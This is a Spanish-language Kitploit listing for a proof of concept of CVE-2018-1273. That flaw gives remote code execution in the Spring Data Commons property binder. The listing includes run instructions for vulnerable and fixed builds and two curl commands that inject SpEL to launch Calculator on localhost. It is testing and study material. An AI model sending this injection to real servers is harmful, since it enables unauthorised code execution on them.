Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-1273 — PoC para CVE-2018-1273: RCE del binder de propiedades de Spring Data Commons mediante parámetros de solicitud manipulados contra endpoints REST. Incluye versiones vulnerables y corregidas para pruebas. | Kitploit
Herramientas/GitHubGitHub/hdgokani/cve-2018-1273
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhdgokani/cve-2018-1273

CVE-2018-1273

PoC para CVE-2018-1273: RCE del binder de propiedades de Spring Data Commons mediante parámetros de solicitud manipulados contra endpoints REST. Incluye versiones vulnerables y corregidas para pruebas.

Ver Repositorio
hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-1273

Spring Data Commons, versiones anteriores a 1.13 a 1.13.10, 2.0 a 2.0.5, y versiones antiguas no soportadas, contienen una vulnerabilidad en el enlazador de propiedades causada por una neutralización incorrecta de elementos especiales. Un usuario malicioso remoto no autenticado (o atacante) puede enviar parámetros de solicitud especialmente diseñados contra recursos HTTP respaldados por Spring Data REST o utilizando el enlace de carga útil de solicitudes basado en proyecciones de Spring Data, lo que puede llevar a un ataque de ejecución remota de código.

Más información aquí

Ejecución

La aplicación se puede probar con la versión vulnerable o la versión corregida de Spring Data Commons.

  • Versión vulnerable (por defecto):
root@kitploit:~
mvn spring-boot:run
  • Versión corregida:
root@kitploit:~
mvn spring-boot:run -Dfixed

Probando la vulnerabilidad

Ejecute el siguiente comando para comprobar si se puede explotar la vulnerabilidad:

  • En Windows:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"

  • En MacOs:
root@kitploit:~
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('/Applications/Calculator.app/Contents/MacOS/Calculator')]=test"

Créditos

Creado por https://www.arima.eu

ARIMA Software Design

Descargar herramienta